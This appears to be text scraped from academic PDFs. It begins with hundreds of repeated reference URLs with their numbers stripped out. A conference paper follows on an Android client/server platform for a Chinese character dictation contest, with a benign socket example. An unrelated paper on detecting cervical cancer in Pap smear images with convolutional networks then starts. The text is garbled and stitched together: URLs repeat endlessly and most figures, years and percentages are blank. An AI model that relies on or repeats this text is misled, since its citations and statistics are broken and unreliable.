http://www.nrdc.org/energy/files/data-center-efficiency-assessment-ip.pdf http://www.nrdc.org/energy/files/data-center-efficiency-assessment-ip.pdf http://www.nrdc.org/energy/files/data-center-efficiency-assessment-ip.pdf http://www.nrdc.org/energy/files/data-center-efficiency-assessment-ip.pdf http://www.nrdc.org/energy/files/data-center-efficiency-assessment-ip.pdf http://www.nrdc.org/energy/files/data-center-efficiency-assessment-ip.pdf http://www.nrdc.org/energy/files/data-center-efficiency-assessment-ip.pdf http://www.nrdc.org/energy/files/data-center-efficiency-assessment-ip.pdf http://www.nrdc.org/energy/files/data-center-efficiency-assessment-ip.pdf http://www.nrdc.org/energy/files/data-center-efficiency-assessment-ip.pdf http://www.nrdc.org/energy/files/data-center-efficiency-assessment-ip.pdf http://www.nrdc.org/energy/files/data-center-efficiency-assessment-ip.pdf http://www.nrdc.org/energy/files/data-center-efficiency-assessment-ip.pdf http://www.nrdc.org/energy/files/data-center-efficiency-assessment-ip.pdf http://www.nrdc.org/energy/files/data-center-efficiency-assessment-ip.pdf http://www.nrdc.org/energy/files/data-center-efficiency-assessment-ip.pdf http://www.nrdc.org/energy/files/data-center-efficiency-assessment-ip.pdf http://www.nrdc.org/energy/files/data-center-efficiency-assessment-ip.pdf http://www.nrdc.org/energy/files/data-center-efficiency-assessment-ip.pdf http://www.nrdc.org/energy/files/data-center-efficiency-assessment-ip.pdf http://www.nrdc.org/energy/files/data-center-efficiency-assessment-ip.pdf http://www.nrdc.org/energy/files/data-center-efficiency-assessment-ip.pdf http://www.nrdc.org/energy/files/data-center-efficiency-assessment-ip.pdf http://www.nrdc.org/energy/files/data-center-efficiency-assessment-ip.pdf http://www.nrdc.org/energy/files/data-center-efficiency-assessment-ip.pdf http://www.nrdc.org/energy/files/data-center-efficiency-assessment-ip.pdf http://www.nrdc.org/energy/files/data-center-efficiency-assessment-ip.pdf 
http://www.nrdc.org/energy/files/data-center-efficiency-assessment-ip.pdf http://www.nrdc.org/energy/files/data-center-efficiency-assessment-ip.pdf http://www.nrdc.org/energy/files/data-center-efficiency-assessment-ip.pdf http://www.nrdc.org/energy/files/data-center-efficiency-assessment-ip.pdf http://www.nrdc.org/energy/files/data-center-efficiency-assessment-ip.pdf http://www.nrdc.org/energy/files/data-center-efficiency-assessment-ip.pdf http://www.nrdc.org/energy/files/data-center-efficiency-assessment-ip.pdf http://www.nrdc.org/energy/files/data-center-efficiency-assessment-ip.pdf http://www.nrdc.org/energy/files/data-center-efficiency-assessment-ip.pdf http://www.nrdc.org/energy/files/data-center-efficiency-assessment-ip.pdf http://www.nrdc.org/energy/files/data-center-efficiency-assessment-ip.pdf http://www.nrdc.org/energy/files/data-center-efficiency-assessment-ip.pdf http://www.nrdc.org/energy/files/data-center-efficiency-assessment-ip.pdf http://www.nrdc.org/energy/files/data-center-efficiency-assessment-ip.pdf http://www.nrdc.org/energy/files/data-center-efficiency-assessment-ip.pdf http://www.nrdc.org/energy/files/data-center-efficiency-assessment-ip.pdf http://www.nrdc.org/energy/files/data-center-efficiency-assessment-ip.pdf http://www.nrdc.org/energy/files/data-center-efficiency-assessment-ip.pdf http://www.nrdc.org/energy/files/data-center-efficiency-assessment-ip.pdf http://www.nrdc.org/energy/files/data-center-efficiency-assessment-ip.pdf http://www.nrdc.org/energy/files/data-center-efficiency-assessment-ip.pdf http://www.nrdc.org/energy/files/data-center-efficiency-assessment-ip.pdf http://www.nrdc.org/energy/files/data-center-efficiency-assessment-ip.pdf http://www.nrdc.org/energy/files/data-center-efficiency-assessment-ip.pdf http://www.nrdc.org/energy/files/data-center-efficiency-assessment-ip.pdf http://www.nrdc.org/energy/files/data-center-efficiency-assessment-ip.pdf https://www.aaai.org/ocs/index.php/aaai/aaai /paper/download/ / https://www.aaai.org/ocs/index.php/aaai/aaai /paper/download/ / https://www.aaai.org/ocs/index.php/aaai/aaai /paper/download/ / https://www.aaai.org/ocs/index.php/aaai/aaai /paper/download/ / https://www.aaai.org/ocs/index.php/aaai/aaai /paper/download/ / https://www.aaai.org/ocs/index.php/aaai/aaai /paper/download/ / https://www.aaai.org/ocs/index.php/aaai/aaai /paper/download/ / https://www.aaai.org/ocs/index.php/aaai/aaai /paper/download/ / https://www.aaai.org/ocs/index.php/aaai/aaai /paper/download/ / https://www.aaai.org/ocs/index.php/aaai/aaai /paper/download/ / https://www.aaai.org/ocs/index.php/aaai/aaai /paper/download/ / https://www.aaai.org/ocs/index.php/aaai/aaai /paper/download/ / https://www.aaai.org/ocs/index.php/aaai/aaai /paper/download/ / https://www.aaai.org/ocs/index.php/aaai/aaai /paper/download/ / https://www.aaai.org/ocs/index.php/aaai/aaai /paper/download/ / https://www.aaai.org/ocs/index.php/aaai/aaai /paper/download/ / https://www.aaai.org/ocs/index.php/aaai/aaai /paper/download/ / https://www.aaai.org/ocs/index.php/aaai/aaai /paper/download/ / https://www.aaai.org/ocs/index.php/aaai/aaai /paper/download/ / https://www.aaai.org/ocs/index.php/aaai/aaai /paper/download/ / https://www.aaai.org/ocs/index.php/aaai/aaai /paper/download/ / https://www.aaai.org/ocs/index.php/aaai/aaai /paper/download/ / https://www.aaai.org/ocs/index.php/aaai/aaai /paper/download/ / https://www.aaai.org/ocs/index.php/aaai/aaai /paper/download/ / https://www.aaai.org/ocs/index.php/aaai/aaai /paper/download/ / 
https://www.aaai.org/ocs/index.php/aaai/aaai /paper/download/ / https://www.aaai.org/ocs/index.php/aaai/aaai /paper/download/ / https://www.aaai.org/ocs/index.php/aaai/aaai /paper/download/ / https://www.aaai.org/ocs/index.php/aaai/aaai /paper/download/ / https://www.aaai.org/ocs/index.php/aaai/aaai /paper/download/ / https://www.aaai.org/ocs/index.php/aaai/aaai /paper/download/ / https://www.aaai.org/ocs/index.php/aaai/aaai /paper/download/ / https://www.aaai.org/ocs/index.php/aaai/aaai /paper/download/ / https://www.aaai.org/ocs/index.php/aaai/aaai /paper/download/ / https://www.aaai.org/ocs/index.php/aaai/aaai /paper/download/ / https://www.aaai.org/ocs/index.php/aaai/aaai /paper/download/ / https://www.aaai.org/ocs/index.php/aaai/aaai /paper/download/ / https://www.aaai.org/ocs/index.php/aaai/aaai /paper/download/ / https://www.aaai.org/ocs/index.php/aaai/aaai /paper/download/ / https://www.aaai.org/ocs/index.php/aaai/aaai /paper/download/ / https://www.aaai.org/ocs/index.php/aaai/aaai /paper/download/ / https://www.aaai.org/ocs/index.php/aaai/aaai /paper/download/ / https://www.aaai.org/ocs/index.php/aaai/aaai /paper/download/ / https://www.aaai.org/ocs/index.php/aaai/aaai /paper/download/ / https://www.aaai.org/ocs/index.php/aaai/aaai /paper/download/ / https://www.aaai.org/ocs/index.php/aaai/aaai /paper/download/ / https://www.aaai.org/ocs/index.php/aaai/aaai /paper/download/ / https://www.aaai.org/ocs/index.php/aaai/aaai /paper/download/ / https://www.aaai.org/ocs/index.php/aaai/aaai /paper/download/ / https://www.aaai.org/ocs/index.php/aaai/aaai /paper/download/ / https://www.aaai.org/ocs/index.php/aaai/aaai /paper/download/ / https://www.aaai.org/ocs/index.php/aaai/aaai /paper/download/ / https://www.aaai.org/ocs/index.php/aaai/aaai /paper/download/ / https://www.aaai.org/ocs/index.php/aaai/aaai /paper/download/ / https://www.aaai.org/ocs/index.php/aaai/aaai /paper/download/ / https://www.aaai.org/ocs/index.php/aaai/aaai /paper/download/ / https://www.aaai.org/ocs/index.php/aaai/aaai /paper/download/ / https://www.aaai.org/ocs/index.php/aaai/aaai /paper/download/ / https://www.aaai.org/ocs/index.php/aaai/aaai /paper/download/ / https://www.aaai.org/ocs/index.php/aaai/aaai /paper/download/ / https://www.aaai.org/ocs/index.php/aaai/aaai /paper/download/ / https://www.aaai.org/ocs/index.php/aaai/aaai /paper/download/ / https://www.aaai.org/ocs/index.php/aaai/aaai /paper/download/ / https://www.aaai.org/ocs/index.php/aaai/aaai /paper/download/ / https://www.aaai.org/ocs/index.php/aaai/aaai /paper/download/ / https://www.aaai.org/ocs/index.php/aaai/aaai /paper/download/ / https://www.aaai.org/ocs/index.php/aaai/aaai /paper/download/ / https://www.aaai.org/ocs/index.php/aaai/aaai /paper/download/ / https://www.aaai.org/ocs/index.php/aaai/aaai /paper/download/ / https://www.aaai.org/ocs/index.php/aaai/aaai /paper/download/ / https://www.aaai.org/ocs/index.php/aaai/aaai /paper/download/ / http://dx.doi.org/ . /journal.pone. http://arxiv.org/abs/ . http://arxiv.org/abs/ . v http://dx.doi.org/ . /mic. . 
http://dev.w .org/html /workers http://dev.w .org/html /workers http://dev.w .org/html /workers http://dev.w .org/html /workers http://dev.w .org/html /workers http://dev.w .org/html /workers http://dev.w .org/html /workers http://dev.w .org/html /workers http://dev.w .org/html /workers http://dev.w .org/html /workers http://dev.w .org/html /workers http://dev.w .org/html /workers http://dev.w .org/html /workers http://dev.w .org/html /workers http://dev.w .org/html /workers http://dev.w .org/html /workers http://dev.w .org/html /workers http://dev.w .org/html /workers http://dev.w .org/html /workers http://dev.w .org/html /workers http://dev.w .org/html /workers http://dev.w .org/html /workers http://dev.w .org/html /workers http://dev.w .org/html /workers http://dev.w .org/html /workers http://dev.w .org/html /workers http://dev.w .org/html /workers http://dev.w .org/html /workers http://dev.w .org/html /workers http://dev.w .org/html /workers http://dev.w .org/html /workers http://w techs.com/technologies/details/cp-javascript/all/all http://w techs.com/technologies/details/cp-javascript/all/all http://w techs.com/technologies/details/cp-javascript/all/all http://w techs.com/technologies/details/cp-javascript/all/all http://w techs.com/technologies/details/cp-javascript/all/all http://w techs.com/technologies/details/cp-javascript/all/all http://w techs.com/technologies/details/cp-javascript/all/all http://w techs.com/technologies/details/cp-javascript/all/all http://w techs.com/technologies/details/cp-javascript/all/all http://w techs.com/technologies/details/cp-javascript/all/all http://w techs.com/technologies/details/cp-javascript/all/all http://w techs.com/technologies/details/cp-javascript/all/all http://w techs.com/technologies/details/cp-javascript/all/all http://w techs.com/technologies/details/cp-javascript/all/all http://w techs.com/technologies/details/cp-javascript/all/all http://w techs.com/technologies/details/cp-javascript/all/all http://w techs.com/technologies/details/cp-javascript/all/all http://w techs.com/technologies/details/cp-javascript/all/all http://w techs.com/technologies/details/cp-javascript/all/all http://w techs.com/technologies/details/cp-javascript/all/all http://w techs.com/technologies/details/cp-javascript/all/all http://w techs.com/technologies/details/cp-javascript/all/all http://w techs.com/technologies/details/cp-javascript/all/all http://w techs.com/technologies/details/cp-javascript/all/all http://w techs.com/technologies/details/cp-javascript/all/all http://w techs.com/technologies/details/cp-javascript/all/all http://w techs.com/technologies/details/cp-javascript/all/all http://w techs.com/technologies/details/cp-javascript/all/all http://w techs.com/technologies/details/cp-javascript/all/all http://w techs.com/technologies/details/cp-javascript/all/all http://w techs.com/technologies/details/cp-javascript/all/all http://w techs.com/technologies/details/cp-javascript/all/all http://w techs.com/technologies/details/cp-javascript/all/all http://w techs.com/technologies/details/cp-javascript/all/all http://w techs.com/technologies/details/cp-javascript/all/all http://w techs.com/technologies/details/cp-javascript/all/all http://w techs.com/technologies/details/cp-javascript/all/all http://w techs.com/technologies/details/cp-javascript/all/all http://w techs.com/technologies/details/cp-javascript/all/all http://w techs.com/technologies/details/cp-javascript/all/all http://w techs.com/technologies/details/cp-javascript/all/all http://w 
techs.com/technologies/details/cp-javascript/all/all http://w techs.com/technologies/details/cp-javascript/all/all http://w techs.com/technologies/details/cp-javascript/all/all http://w techs.com/technologies/details/cp-javascript/all/all http://w techs.com/technologies/details/cp-javascript/all/all http://w techs.com/technologies/details/cp-javascript/all/all http://w techs.com/technologies/details/cp-javascript/all/all http://w techs.com/technologies/details/cp-javascript/all/all http://w techs.com/technologies/details/cp-javascript/all/all http://w techs.com/technologies/details/cp-javascript/all/all http://w techs.com/technologies/details/cp-javascript/all/all http://w techs.com/technologies/details/cp-javascript/all/all http://w techs.com/technologies/details/cp-javascript/all/all http://w techs.com/technologies/details/cp-javascript/all/all http://w techs.com/technologies/details/cp-javascript/all/all http://w techs.com/technologies/details/cp-javascript/all/all http://w techs.com/technologies/details/cp-javascript/all/all http://w techs.com/technologies/details/cp-javascript/all/all http://w techs.com/technologies/details/cp-javascript/all/all http://w techs.com/technologies/details/cp-javascript/all/all http://papers.nips.cc/paper/ -parallelized-stochastic-gradient-descent.pdf http://papers.nips.cc/paper/ -parallelized-stochastic-gradient-descent.pdf http://papers.nips.cc/paper/ -parallelized-stochastic-gradient-descent.pdf http://papers.nips.cc/paper/ -parallelized-stochastic-gradient-descent.pdf http://papers.nips.cc/paper/ -parallelized-stochastic-gradient-descent.pdf http://papers.nips.cc/paper/ -parallelized-stochastic-gradient-descent.pdf http://papers.nips.cc/paper/ -parallelized-stochastic-gradient-descent.pdf http://papers.nips.cc/paper/ -parallelized-stochastic-gradient-descent.pdf http://papers.nips.cc/paper/ -parallelized-stochastic-gradient-descent.pdf http://papers.nips.cc/paper/ -parallelized-stochastic-gradient-descent.pdf http://papers.nips.cc/paper/ -parallelized-stochastic-gradient-descent.pdf http://papers.nips.cc/paper/ -parallelized-stochastic-gradient-descent.pdf http://papers.nips.cc/paper/ -parallelized-stochastic-gradient-descent.pdf http://papers.nips.cc/paper/ -parallelized-stochastic-gradient-descent.pdf http://papers.nips.cc/paper/ -parallelized-stochastic-gradient-descent.pdf http://papers.nips.cc/paper/ -parallelized-stochastic-gradient-descent.pdf http://papers.nips.cc/paper/ -parallelized-stochastic-gradient-descent.pdf http://papers.nips.cc/paper/ -parallelized-stochastic-gradient-descent.pdf http://papers.nips.cc/paper/ -parallelized-stochastic-gradient-descent.pdf http://papers.nips.cc/paper/ -parallelized-stochastic-gradient-descent.pdf http://papers.nips.cc/paper/ -parallelized-stochastic-gradient-descent.pdf http://papers.nips.cc/paper/ -parallelized-stochastic-gradient-descent.pdf http://papers.nips.cc/paper/ -parallelized-stochastic-gradient-descent.pdf http://papers.nips.cc/paper/ -parallelized-stochastic-gradient-descent.pdf http://papers.nips.cc/paper/ -parallelized-stochastic-gradient-descent.pdf http://papers.nips.cc/paper/ -parallelized-stochastic-gradient-descent.pdf http://papers.nips.cc/paper/ -parallelized-stochastic-gradient-descent.pdf http://papers.nips.cc/paper/ -parallelized-stochastic-gradient-descent.pdf http://papers.nips.cc/paper/ -parallelized-stochastic-gradient-descent.pdf http://papers.nips.cc/paper/ -parallelized-stochastic-gradient-descent.pdf http://papers.nips.cc/paper/ 
-parallelized-stochastic-gradient-descent.pdf http://papers.nips.cc/paper/ -parallelized-stochastic-gradient-descent.pdf http://papers.nips.cc/paper/ -parallelized-stochastic-gradient-descent.pdf http://papers.nips.cc/paper/ -parallelized-stochastic-gradient-descent.pdf http://papers.nips.cc/paper/ -parallelized-stochastic-gradient-descent.pdf http://papers.nips.cc/paper/ -parallelized-stochastic-gradient-descent.pdf http://papers.nips.cc/paper/ -parallelized-stochastic-gradient-descent.pdf http://papers.nips.cc/paper/ -parallelized-stochastic-gradient-descent.pdf http://papers.nips.cc/paper/ -parallelized-stochastic-gradient-descent.pdf http://papers.nips.cc/paper/ -parallelized-stochastic-gradient-descent.pdf http://papers.nips.cc/paper/ -parallelized-stochastic-gradient-descent.pdf http://papers.nips.cc/paper/ -parallelized-stochastic-gradient-descent.pdf http://papers.nips.cc/paper/ -parallelized-stochastic-gradient-descent.pdf http://papers.nips.cc/paper/ -parallelized-stochastic-gradient-descent.pdf http://papers.nips.cc/paper/ -parallelized-stochastic-gradient-descent.pdf http://papers.nips.cc/paper/ -parallelized-stochastic-gradient-descent.pdf http://papers.nips.cc/paper/ -parallelized-stochastic-gradient-descent.pdf http://papers.nips.cc/paper/ -parallelized-stochastic-gradient-descent.pdf http://papers.nips.cc/paper/ -parallelized-stochastic-gradient-descent.pdf http://papers.nips.cc/paper/ -parallelized-stochastic-gradient-descent.pdf http://papers.nips.cc/paper/ -parallelized-stochastic-gradient-descent.pdf http://papers.nips.cc/paper/ -parallelized-stochastic-gradient-descent.pdf http://papers.nips.cc/paper/ -parallelized-stochastic-gradient-descent.pdf http://papers.nips.cc/paper/ -parallelized-stochastic-gradient-descent.pdf http://papers.nips.cc/paper/ -parallelized-stochastic-gradient-descent.pdf http://papers.nips.cc/paper/ -parallelized-stochastic-gradient-descent.pdf http://papers.nips.cc/paper/ -parallelized-stochastic-gradient-descent.pdf http://papers.nips.cc/paper/ -parallelized-stochastic-gradient-descent.pdf http://papers.nips.cc/paper/ -parallelized-stochastic-gradient-descent.pdf http://papers.nips.cc/paper/ -parallelized-stochastic-gradient-descent.pdf http://papers.nips.cc/paper/ -parallelized-stochastic-gradient-descent.pdf http://papers.nips.cc/paper/ -parallelized-stochastic-gradient-descent.pdf http://papers.nips.cc/paper/ -parallelized-stochastic-gradient-descent.pdf http://papers.nips.cc/paper/ -parallelized-stochastic-gradient-descent.pdf http://papers.nips.cc/paper/ -parallelized-stochastic-gradient-descent.pdf http://papers.nips.cc/paper/ -parallelized-stochastic-gradient-descent.pdf http://papers.nips.cc/paper/ -parallelized-stochastic-gradient-descent.pdf http://papers.nips.cc/paper/ -parallelized-stochastic-gradient-descent.pdf http://papers.nips.cc/paper/ -parallelized-stochastic-gradient-descent.pdf http://papers.nips.cc/paper/ -parallelized-stochastic-gradient-descent.pdf http://papers.nips.cc/paper/ -parallelized-stochastic-gradient-descent.pdf http://papers.nips.cc/paper/ -parallelized-stochastic-gradient-descent.pdf http://papers.nips.cc/paper/ -parallelized-stochastic-gradient-descent.pdf http://papers.nips.cc/paper/ -parallelized-stochastic-gradient-descent.pdf http://papers.nips.cc/paper/ -parallelized-stochastic-gradient-descent.pdf http://papers.nips.cc/paper/ -parallelized-stochastic-gradient-descent.pdf http://papers.nips.cc/paper/ -parallelized-stochastic-gradient-descent.pdf http://dx.doi.org/ . /peerj-cs. 
international conference on sensor network and computer engineering (icsnce)

research on comprehensive training platform for software engineering based on android

pan chunhua, sun yan, zan fengbiao
school of computer, qinghai university for nationalities, xining city, qinghai province

abstract: with respect to the training program of the software engineering specialty, this paper puts forward an android-based comprehensive training platform for the chinese character dictation competition and clarifies the purpose and main contents of the platform. built on the hardware and software facilities of the campus, the platform adopts the c/s model: the android client implements chinese character writing, erasing, timing and other functions, while the administrator manages the entire competition process, including the participating teams and players. the administrator can simultaneously obtain the chinese characters entered on the clients and display them on the big screen; the judges then score the answers, and the results are summarized and displayed. the whole integrated training platform is light and practical.

keywords: c/s; server; client app

i. introduction
software is applied in many aspects of modern society. almost all industries have computer software applications, such as manufacturing, agriculture, banking, aviation and government agencies. modern life is almost inseparable from the mobile phone, and mobile applications are being deployed at an incredible pace. these applications not only promote economic and social growth, but also improve the efficiency of work and life in general. the mainstream mobile phone operating systems include android, ios and wp. by building a training platform on the android system, software engineering students can cultivate their software analysis, design, development and maintenance capabilities, as well as skills in project organization and management, teamwork, technological innovation and market development. this provides good experimental teaching innovation in a practical environment and new ideas for reforming the teaching process.

ii. skills required for software engineering professionals
software engineering students need to learn discrete mathematics, object-oriented programming, data structures, data communication and computer networks, database system principles, software engineering, computer system architecture, software project management, the unified modeling language, and software quality and testing.
through the comprehensive training platform, students can master mainstream and typical software development and debugging skills, understand the current status and trends of software engineering, and acquire good communication skills and a positive teamwork attitude.

iii. integrated training platform features and content
software engineering education needs to drive theory, practice, network and experimental teaching as a whole, completing three-dimensional teaching as a complete teaching organization model. the comprehensive training platform is based on software engineering development practice: 1) it builds on unified mainstream software technology, with a standard based on the c/s architecture of the integrated training platform; 2) the android-based app imitates the cctv chinese character dictation competition. its specific function is to provide students with an interface to write chinese characters and submit the results. the server side allows the administrator to record the students' messages and questions, correct and send the answers, summarize personal and team results, and finally show the result rankings.

iv. android-based training platform
a. training platform system design
the hardware requirements of the integrated training platform are a desktop computer running windows and a tablet pc running the android system. this setup is simple and easy to operate, with strong practical and promotional value. the software development environment requires the java jdk, an ide (eclipse or netbeans), and database software (such as the commonly used excel and access databases, or sql server). the software for the entire training platform is common, easy to use, and reliable.

b. training platform architectural framework
figure . software structure diagram (chinese dictation system: client management, player management, test question management, performance management, examination management; functions include writing, deleting, submitting, inputting, modifying, exporting, summarizing, sending questions, sending messages, countdown, and confirm-to-continue).

graph theory, the mathematical basis of modern computer science, shows that structure determines properties. the architecture of the training platform is likewise a hierarchical tree structure, based on a two-tier c/s model: client + server (server program + database program). the training platform architecture also allows students to fully grasp the skills required by software engineering.

1) client app program
the client uses the countdown display control and an input pen to write the required chinese characters, complete and modify the writing, submit the result, and then wait for the server to judge, as shown in figure .
figure . client-side structure (contestant: write chinese characters, submit, erase).

2) server side
the server manages the entire process of the competition: it records team and player information, obtains the chinese characters input on the clients and displays them on the big screen, controls the competition time, and shows the correct answer after the clients complete their submissions. the judges give the points and the competition results are calculated. the structure is shown in figure .
figure . server-side structure (administrator use cases: exam entry, player entry, player information, displaying answers, sending information separately according to site time, calling the ppt display, performance management, summary ranking, and display of arbitration information).

3) module functions
- client input: students input characters on the grid, delete a whole character or erase a single stroke, and confirm the submission.
- player information: enter and modify the unit and name information.
- test results management: use the access database and excel as the database with statistical support; complete the entry, modify the questions, and perform the statistics functions.
- test management: send the test start information, questions, time information and arbitration information, and notify the arbitration officer.

4) network communication module
network communication concepts and skills are a weakness for many software engineering students; understanding and mastering the network architecture and communication model is the key to addressing this problem, and it is the core part of the training platform. the end systems in figure are the pcs, mobile phones and other entities hosting the communicating application processes, and the relay system is a router with routing and packet forwarding functions. developing a network communication process on the android system requires a bridge-like abstract unit connected to the application process. in the android system, the existing socket class can be used; the socket interface in the tcp/ip architecture sits between the application layer and the transport layer, as shown in figure . without this interface the communication cannot proceed at all, just as mail cannot be delivered without a postman. to understand the network structure specifically, students need to consider both horizontal peer-to-peer communication and the vertical direction of actual data transfer; understanding both levels at once is difficult. the training platform uses a tcp connection and the socket interface to complete the underlying communication, achieving correct timing and answer transmission with the send and receive functions. through the android-based training platform, students can experience a concrete communication process.

figure . network osi reference model (end systems and a relay system connected by a transmission medium, spanning the application, presentation, session, transport, network, data link and physical layers).
figure . tcp/ip architecture (application layer: ftp, telnet, http, dns, snmp, tftp, ntp; transport layer: tcp, udp; network layer: ip; host-to-network/network access layer; the socket interface sits between the application and transport layers).

a particular communication process runs as follows: the server first starts the service, establishes a socket, enters the listening state and waits for connections. the client presses the start button, and the writing time and other display information are set for the client. the client then enters the connected state and answers; once the answer has been entered and a connection with the server is established, the answer is sent to the server side.
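the exchange described above (the server listens on a socket, the client connects and submits the written answer, and the server replies with a verdict) can be sketched generically as follows. the port, the utf-8 message format, and the function names are illustrative assumptions, not the platform's actual protocol; the real client in the paper is an android app written in java on top of the socket class.

```python
# minimal sketch of the client/server exchange described above.
# the port, message framing, and verdict logic are illustrative assumptions.
import socket
import threading
import time

HOST, PORT = "127.0.0.1", 5005  # hypothetical address for the demo


def run_server(expected_answer: str) -> None:
    """listen for one client, receive its answer, reply with a verdict."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as srv:
        srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        srv.bind((HOST, PORT))
        srv.listen(1)
        conn, _addr = srv.accept()
        with conn:
            answer = conn.recv(1024).decode("utf-8").strip()
            verdict = "correct" if answer == expected_answer else "wrong"
            conn.sendall(verdict.encode("utf-8"))


def submit_answer(answer: str) -> str:
    """client side: connect, send the written characters, read the verdict."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as cli:
        cli.connect((HOST, PORT))
        cli.sendall(answer.encode("utf-8"))
        return cli.recv(1024).decode("utf-8")


if __name__ == "__main__":
    t = threading.Thread(target=run_server, args=("你好",), daemon=True)
    t.start()
    time.sleep(0.5)                      # give the server time to start listening
    print(submit_answer("你好"))          # prints "correct"
```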
5) complete class diagram of the integrated training platform design
the design and development of the comprehensive training platform uses the currently popular object-oriented approach. the designed classes and their functional methods include: the boot interface class start, the writing interface class hztxview, the writing control class hztx, internal classes (the answer listener class datilistener, the end-of-answer listener class jieshulistener, and the timing class mycount), and the writing action class myaction with its subclasses (the writing class mypath and the erase class myeraser).

6) timing statistics function
when the pc server sends the start command, the android client counts down based on the received time and displays the correct answer at the end of the time for the judges and the audience, ending the round. the server can view all team and player scores and rankings, and send the required information to the clients.

v. conclusion
writing chinese characters transmits chinese civilization, enhances the understanding of chinese culture, and increases love of the country, so the development of this integrated training platform for writing chinese characters provides a good platform with good social benefits. the comprehensive training platform for the chinese character dictation competition exceeds the school's basic requirements for chinese characters; processing the information and the final scores and displaying them on the big screen for the judges and the audience in public places meets the fairness requirement of the competition. the training platform creates an environment in which students take the initiative and learn independently, systematically mastering the basic knowledge of software engineering and the whole software development process; it also trains the other comprehensive abilities of software engineering students and provides a complete, realistic, open and simulated integrated network training platform that is easy to use.

acknowledgment
project support: ministry of education "chunhui plan" cooperation research project, project number: z .

cervical cancer detection in pap smear whole slide images using convnet with transfer learning and progressive resizing
anant r. bhatt*, amit ganatra* and ketan kotecha
centre of excellence for artificial intelligence, military college of telecommunication engineering, mhow, madhya pradesh, india; devang patel institute of advance technology and research, charotar university of science and technology, changa, gujarat, india; symbiosis centre for applied artificial intelligence, symbiosis international (deemed university), pune, maharashtra, india
* these authors contributed equally to this work.

abstract
cervical intraepithelial neoplasia (cin) and cervical cancer are major health problems faced by women worldwide. the conventional papanicolaou (pap) smear analysis is an effective method to diagnose cervical pre-malignant and malignant conditions by analyzing swab images. various computer vision techniques can be explored to identify potential precancerous and cancerous lesions by analyzing the pap smear image. the majority of existing work covers binary classification approaches using various classifiers and convolution neural networks; however, they suffer from inherent challenges for minute feature extraction and precise classification. we propose a novel methodology to carry out the multiclass classification of cervical cells from whole slide images (wsi) with optimum feature extraction. the actualization of a convnet with the transfer learning technique substantiates meaningful metamorphic diagnosis of neoplastic and pre-neoplastic lesions. as the progressive resizing technique (an advanced method for training convnets) incorporates prior knowledge of the feature hierarchy and can reuse old computations while learning new ones, the model can carry forward the extracted morphological cell features to subsequent neural network layers iteratively. superimposing the progressive resizing technique on transfer learning while training the convnet models has shown a substantial performance increase. the proposed binary and multiclass classification methodology aided in achieving benchmark scores on the herlev dataset. we achieved singular multiclass classification scores for wsi images of the sipakmed dataset, that is, accuracy ( . %), precision ( . %), recall ( . %), f-beta ( . %), and kappa scores ( . %), which supersede the scores obtained through principal methodologies. gradcam-based feature interpretation extends enhanced assimilation of the generated results, highlighting the pre-malignant and malignant lesions by visual localization in the images.

subjects: artificial intelligence, computer vision, data mining and machine learning, data science
keywords: cervical cytology, cervical cancer, transfer learning, papanicolaou smear, progressive resizing, convolution neural network, sipakmed, herlev, metamorphic analysis, deep learning
introduction
the global cancer burden is estimated to have risen to . million new cases and . million deaths in . one in five men and one in six women worldwide develop cancer during their lifetime, and one in eight men and one in women die from the disease. explicitly, cervical cancer is the fourth most common malignant tumor threatening women's health, especially in developing countries. the total number of cervical cancer cases in reported by the world health organization (who) was , , and the number of deaths was , ; cervical cancer ranks fourth for both incidence ( . %) and mortality ( . %) (world health organization, b). cervical cancer develops in a woman's cervix (the entrance to the uterus from the vagina). human papillomavirus (hpv), a ubiquitous viral infection, is a primary cause of cervical cancer in % of the cases. persistent hpv infection progressively leads to the development of cervical cancer in women. uncontrolled growth of cells caused by antiapoptotic mutations results in a mass referred to as a tumor, and tumor buds can spread to other body parts, leading to severe medical conditions. mortality and morbidity remain high if the disease is not detected and treated in due time (world health organization, a). studies suggest that cervical cancer can be treated successfully if the precancerous lesions are detected in time during cytological screening and human papillomavirus (hpv) testing (saslow et al., ). hpv vaccination and detection/treatment are the prevention methods in practice. cervical cancer can be averted by initiating proactive prevention measures, regular screening tests, and treatment.

the conventional papanicolaou test (papanicolaou & traut, ), also called the pap smear test, is an important stage in mitigating the rising challenge of cervical cancer. a skilled pathologist identifies carcinoma signatures by manually analyzing the morphological features of the cells in microscopic slides. since manual analysis is subjective to the expert's knowledge of the disease's etiology and experience, it may lead to many false-negative or false-positive results, leading to incorrect diagnoses and treatments. also, screening tests carried out in mass imply a higher turn-around time for results and substandard screening analysis. the non-availability of expert pathologists and suitable infrastructure restricts cervical cancer screening drives in developing countries.

deep learning techniques provide a prodigious prospect for enhanced interpretation and analysis of pap smear images during metamorphic diagnosis of neoplastic and pre-neoplastic lesions. since the cells' morphology undergoes distinct changes during infection, it plays a decisive role in identifying carcinoma signatures in pap smear images. hence, deep learning techniques can extract relevant morphology features and carry out whole slide image analysis to identify carcinoma conditions. we followed the bethesda system (tbs) (solomon et al., ), which explains the cytological classification based on standard medical terms to describe abnormal findings from conventional pap smears (cps) and liquid-based cytology (lbc). although convolution neural networks (cnn) can extract, identify, and classify carcinoma cells, we elaborate a novel methodology to improve the extraction of morphological features, thereby increasing accuracy, sensitivity, specificity, and f scores.
state of the art
implementation of various cnns with transfer learning and progressive resizing techniques presents a definitive approach for enhanced learning and effective classification of carcinoma cells. we studied current implementations and methods on cervical cancer datasets. we analyzed the datasets and reviewed recent work, that is, k-means clustering and the sbrg algorithm (isa, ), which detects the edges of multiple cells / the region of interest (roi). in addition to the edge detection method, we explored different supervised and unsupervised techniques (plissiti, nikou & charchanti, ; plissiti et al., ). in these approaches, nuclei locations are detected first, followed by a refinement step that uses this nuclei information (the circumference of the nuclei). a few of them are followed by a classification algorithm to detect the abnormal cells in the images. both supervised and unsupervised techniques, that is, support vector machines and fuzzy logic, were applied. we also studied various classifiers, that is, k-nearest neighbour, stochastic gradient descent, support vector machines (cortes & vapnik, ), and random forest. one of the approaches, deeppap (zhang et al., ), was also studied in detail: in deeppap, classification is performed on cropped images, where single-cell cropping is carried out with the nucleus as the centroid. however, these methodologies suffer from prominent challenges, as follows:
1. they depend on the localization of nuclei;
2. they detect and classify images of a single cell only;
3. feature extraction is comparatively substandard for unclear/blurred visual exposure of overlapping cells;
4. single-cell classification implies binary classification.

